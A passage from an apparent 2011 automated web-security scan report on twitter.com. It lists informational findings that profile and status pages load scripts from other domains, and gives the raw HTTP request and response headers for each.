</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.516. http://twitter.com/onlyjazz previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/onlyjazz

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /onlyjazz HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234535-70662-50680
ETag: "f52a0a58560fb29dddf78f5b8f984397"
Last-Modified: Fri, 28 Jan 2011 17:08:55 GMT
X-Runtime: 0.01601
Content-Type: text/html; charset=utf-8
Content-Length: 49398
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE6DHR6X25hbWUiFENlbnRyYWwgQW1lcmljYQ%253D%253D--cfd12ccdf4950b48b8bfd5a21dc805af5732a2dc; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.517. http://twitter.com/onlyjazz/status/29924505002446849 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/onlyjazz/status/29924505002446849

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224923-90834-17466
ETag: "5608c66aeb64567924807b23b0514ade"
Last-Modified: Fri, 28 Jan 2011 14:28:43 GMT
X-Runtime: 0.05594
Content-Type: text/html; charset=utf-8
Content-Length: 13806
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjlodHRwOi8vdHdpdHRlci5jb20vb25seWphenov%250Ac3RhdHVzLzI5OTI0NTA1MDAyNDQ2ODQ5Ogxjc3JmX2lkIiVjZGY1NzI3MTNk%250ANzEzZDVmYzU1N2MyZWJiOTIxMWNhMzoHaWQiJTFjOTUzNDgxYTQyZmRlOWMw%250AYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07w%250AzC0B--92541950a44bd04792a3b27273e15bc7882e2cca; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.518. http://twitter.com/oschina previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/oschina

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224927-42931-41515
ETag: "4ec91c8ea22a5f99253e904c27c6fcbf"
Last-Modified: Fri, 28 Jan 2011 14:28:47 GMT
X-Runtime: 0.00766
Content-Type: text/html; charset=utf-8
Content-Length: 42639
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.519. http://twitter.com/oschina/status/28102821484171264 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/oschina/status/28102821484171264

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224931-1588-6053
ETag: "74e24e45fa1e508376ab48a014b754fb"
Last-Modified: Fri, 28 Jan 2011 14:28:51 GMT
X-Runtime: 0.05739
Content-Type: text/html; charset=utf-8
Content-Length: 13642
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vb3NjaGluYS9z%250AdGF0dXMvMjgxMDI4MjE0ODQxNzEyNjQ6DGNzcmZfaWQiJTEwZDU0OTEzNjYw%250AOWY1ZTk1YmNlOWQ5ZWI3Njc5ZjczOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--68179dfd893f83c3d5cc5cabbcfb96d9a300ec19; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.520. http://twitter.com/oschina/status/28102821484171264 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/oschina/status/28102821484171264

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225138-13520-49440
ETag: "db1f37f1ae6d53b0a13a5f7aaacae199"
Last-Modified: Fri, 28 Jan 2011 14:32:18 GMT
X-Runtime: 0.05248
Content-Type: text/html; charset=utf-8
Content-Length: 13644
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vb3NjaGluYS9z%250AdGF0dXMvMjgxMDI4MjE0ODQxNzEyNjQ6DGNzcmZfaWQiJWQ3ZmEyOWM1YTA2%250AZTU0NWY3YmY5YmZlZDUzMGJmZWE3OgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--2b378141cb3a0836741ec2d8ca9f0d86b32e1bbb; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.521. http://twitter.com/oschina/status/30099933486915584 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/oschina/status/30099933486915584

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /oschina/status/30099933486915584 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:09:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234576-76529-15127
ETag: "312b58ddff1edbb51a56bb6099cd81f0"
Last-Modified: Fri, 28 Jan 2011 17:09:36 GMT
X-Runtime: 0.05464
Content-Type: text/html; charset=utf-8
Content-Length: 13590
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vb3NjaGluYS9z%250AdGF0dXMvMzAwOTk5MzM0ODY5MTU1ODQ6FWluX25ld191c2VyX2Zsb3cwOgxj%250Ac3JmX2lkIiVhYmM0NTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoMdHpf%250AbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--367f8a178a971b6bee0ba3e37963c32d68bfb9a3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.522. http://twitter.com/oschina/status/30099933486915584 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/oschina/status/30099933486915584

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /oschina/status/30099933486915584 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224930-28853-36094
ETag: "f8b960d6a56094881d4f6783365ecf28"
Last-Modified: Fri, 28 Jan 2011 14:28:50 GMT
X-Runtime: 0.06167
Content-Type: text/html; charset=utf-8
Content-Length: 13721
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vb3NjaGluYS9z%250AdGF0dXMvMzAwOTk5MzM0ODY5MTU1ODQ6DGNzcmZfaWQiJWZkOWU3MGFjNzg5%250ANmVhNjZmOTMxN2NlNjZmMGExNWNkOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--6d3f8e3e6d67d971b281da438de9b57a6477922e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.523. http://twitter.com/oschina/status/30099933486915584 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/oschina/status/30099933486915584

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /oschina/status/30099933486915584 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225138-33592-51661
ETag: "5f076aee8adb4cc818cea263f54525c4"
Last-Modified: Fri, 28 Jan 2011 14:32:18 GMT
X-Runtime: 0.05358
Content-Type: text/html; charset=utf-8
Content-Length: 13721
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
